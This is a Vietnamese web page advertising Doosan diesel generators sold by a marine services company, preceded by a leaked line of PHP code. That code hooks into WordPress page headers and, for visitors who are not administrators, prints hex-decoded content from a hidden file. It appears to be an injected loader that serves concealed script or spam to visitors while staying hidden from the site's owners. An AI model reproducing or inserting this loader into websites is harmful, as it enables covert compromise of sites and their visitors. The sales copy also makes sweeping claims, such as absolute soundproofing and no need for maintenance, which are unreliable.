if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Mua máy phát điện Doosan Hàn Quốc chất lượng ở đâu? -

0768303666

.st0{fill:#FFFFFF;}

Tin tức

Mua máy phát điện Doosan Hàn Quốc chất lượng ở đâu?

 Tháng Tư 9, 2021

By  minhvu

Máy phát điện Doosan là dòng máy phát điện chạy dầu được sản xuất bởi tập đoàn Doosan Infracore chuyên về máy phát điện hàng đầu tại Hàn Quốc.

Tổng quan về máy phát điện Doosan

Máy phát điện Doosan là dòng máy được lắp ráp bởi động cơ dầu, cấu tạo từ nhiều bộ phận khác nhau để tạo nên một dòng máy chất lượng và hoạt động tốt.

Đầu máy phát điện Doosan

Đầu máy phát điện Doosan Sử dụng đầu phát không chổi than của thương hiệu nổi tiếng thế giới, tùy theo yêu cầu về mức điện áp hoạt động khác nhau. Thiết kế cuộn dây được tối ưu hóa và loại bỏ ảnh hưởng sóng hài bậc ba; cùng với hiệu suất vượt trội của bộ điều chỉnh điện áp tự động và tự kích từ bằng nam châm vĩnh cửu PMG (tùy chọn). Ngoài ra, hiệu suất vượt trội trong việc tạo ra tải phi tuyến tính giúp cho đầu phát hoạt động vô cùng ổn định và bền bỉ.

Thông số của đầu máy phát điện Doosan
Thông số của đầu máy phát điện Doosan

Động cơ của máy phát điện Doosan Hàn Quốc

Động cơ máy phát điện Doosan là một sản phẩm thế hệ mới với hiệu suất và độ tin cậy hạng nhất; được phát triển trên nền tảng động cơ Daewoo. Động cơ Doosan có mã lực mạnh phù hợp với chế độ chờ. Vì thế máy phát chính được thiết lập để đáp ứng nhu cầu cung cấp điện trên toàn thế giới.

Hệ thống bảng điều khiển máy phát điện Doosan

Hệ thống bảng điều khiển bao gồm:

  • Màn hình hiển thị: thể hiện đầy đủ các thông số cơ bản của máy phát điện về: công suất, điện áp, tần suất, áp suất dầu, dòng điện tải,..hỗ trợ cho việc vận hành máy hoạt động.
  • Nút nhấn dừng khẩn cấp: để khi bạn muốn dừng máy đột ngột khi xảy ra sự cố về máy hoặc về nguồn điện.
  • Công tắc nguồn: thực hiện điều khiển tắt (mở) cho máy hoạt động; đèn báo nguồn: thông báo máy đang làm việc,..

Vỏ cách âm cho máy phát điện Doosan

Vỏ cách âm máy phát điện Doosan được sản xuất bằng thép lạnh theo tiêu chuẩn quốc tế nên đảm bảo cách âm tuyệt đối cho dù âm thanh đó có lớn như thế nào đi nữa.

Lý do nên chọn máy phát điện Doosan Hàn Quốc

Đối với dòng máy phát điện Doosan, chúng có những ưu điểm riêng biệt mà bạn nên chọn sử dụng cho mục đích của mình:

Tiết kiệm nhiên liệu

Máy được hoạt động nhờ vào nhiên liệu dầu nên tiết kiệm nhiên liệu từ 30 -50% so với dòng máy phát điện chạy bằng gas hoặc xăng. Thùng nhiên liệu được đặt ở phần đáy cho phép tổ máy làm việc trong 8 giờ.

Động cơ máy hoạt động bền bỉ

Máy dù đã hoạt động một thời gian dài nhưng vẫn đảm bảo hoạt động tốt; không cần bảo trì, bảo dưỡng thường xuyên.

Dòng máy được bán với chi phí và chất lượng cạnh tranh hơn so với dòng máy phát điện thuộc thương hiệu khác.

Đây cũng được đánh giá là dòng máy thân thiện với môi trường, đảm bảo không gây ô nhiễm không khí.

Có khả năng chống cháy, chống nước, chống bụi

Máy phát điện  Doosan sẵn sàng hoạt động ở mọi thời tiết khác nhau. Không gây cháy nổ, không tiết ra khí độc hại ảnh hưởng đến sức khỏe của con người

Maritime Solutions – Địa chỉ bán máy phát điện Doosan Hàn Quốc chính hãng

Là một trong những đơn vị dẫn đầu thương hiệu về máy phát điện trên thị trường hiện nay. Cùng các cơ sở to, nhỏ tại các tỉnh thành phố: Hải Phòng, Hà Nội, … Maritime Solutions cung cấp dòng máy phát điện Doosan nhập khẩu chính hãng từ Hàn Quốc đảm bảo chất lượng cao, bền và giá thành phải chăng

Máy phát điện Doosan Hàn Quốc nhập khẩu chính hãng Hàn Quốc tại Maritime Solutions
Máy phát điện Doosan Hàn Quốc nhập khẩu chính hãng Hàn Quốc tại Maritime Solutions

Công ty luôn đề cao thực hiện các điều khoản về bảo hành sản phẩm chặt chẽ; cung cấp các dịch vụ chuyên nghiệp; đội ngũ chăm sóc khách hàng chu đáo, nhiệt tình. Chứng minh bằng chặng đường 15 năm với tiêu chí UY TÍN hàng đầu; cung cấp các dịch vụ CHẤT LƯỢNG đi kèm giá trị hợp lí.

Đơn vị chúng tôi cam kết với khách hàng về mọi phương diện mua bán và bảo hành. Bên cạch các dòng máy phát điện, công ty còn cung cấp các dịch vụ: dịch vụ cung ứng hàng hải; sửa chữa tàu thuyền,… Liên hệ ngay với Maritime Solutions – dịch vụ hàng hải để biết thêm thông tin chi tiết.

>>Xem thêm: Tính năng ưu việt của động cơ Cummins

minhvu


Your Signature

{"email":"Email address invalid","url":"Website address invalid","required":"Required field missing"}

Liên hệ với chúng tôi để được tư vấn Dịch vụ và giá cả tốt nhất 

>